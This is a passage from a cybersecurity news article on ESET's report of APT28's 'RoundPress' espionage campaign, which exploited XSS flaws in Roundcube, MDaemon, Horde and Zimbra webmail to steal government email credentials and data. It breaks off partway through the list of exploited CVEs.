Ethical Hacking News
In a significant escalation of global cyber espionage, APT28's "RoundPress" operation has exposed high-value government email credentials through targeted webmail vulnerabilities. Understanding this threat is crucial for protecting sensitive information and staying ahead of emerging threats in the evolving cybersecurity landscape.
APT28 (Fancy Bear/Sednit) hackers have targeted government webmail in a significant escalation of global cyber espionage.The operation, dubbed "RoundPress," uses zero-day and n-day flaws to steal sensitive email information from high-value government organizations worldwide.Attackers use spear-phishing emails referencing current news or political events to add legitimacy and exploit XSS vulnerabilities in webmail browsers.The stolen data is exfiltrated using HTTP POST requests to hardcoded C2 addresses.The RoundPress campaign targets multiple XSS flaws in various webmail products, including Roundcube, MDaemon, Horde, and Zimbra.ESET researchers attribute the operation with medium confidence to APT28, a state-sponsored hacking group.The operation highlights the critical vulnerabilities in widely used webmail systems and underscores the need for enhanced security measures.
In a significant escalation of global cyber espionage, government webmail has been targeted by hackers operating under the banner of APT28, also known as "Fancy Bear" or "Sednit." The operation, dubbed "RoundPress," has been identified as an ongoing campaign leveraging zero-day and n-day flaws in popular webmail servers to steal sensitive email information from high-value government organizations worldwide.
According to ESET researchers who uncovered the operation, RoundPress is characterized by its use of spear-phishing emails referencing current news or political events to add legitimacy. These emails typically contain malicious JavaScript payloads embedded in the HTML body, which trigger the exploitation of cross-site scripting (XSS) vulnerabilities in webmail browsers used by recipients. This vulnerability requires no additional interaction beyond opening the email; it executes automatically when viewed.
The attackers' strategy is designed to trick victims into autofilling stored credentials for their email accounts through invisible input fields or by sending HTTP requests to collect email message content, contacts, webmail settings, login history, two-factor authentication information, and passwords. This stolen data is then exfiltrated to hardcoded command-and-control (C2) addresses using HTTP POST requests.
The RoundPress campaign targets multiple XSS flaws in various webmail products commonly used by important organizations, including Roundcube, MDaemon, Horde, and Zimbra. ESET researchers have identified vulnerabilities associated with these flaws, which were exploited in early 2023 and continued to evolve throughout 2024:
* Roundcube: Two XSS vulnerabilities were identified - CVE-2020-35730 (used in 2023) and CVE-2023-43770 (targeted in early 2024). The first vulnerability allowed hackers to inject malicious JavaScript directly into the body of an email, while the second exploited how Roundcube handled hyperlink text by leveraging improper sanitization, enabling attackers to inject
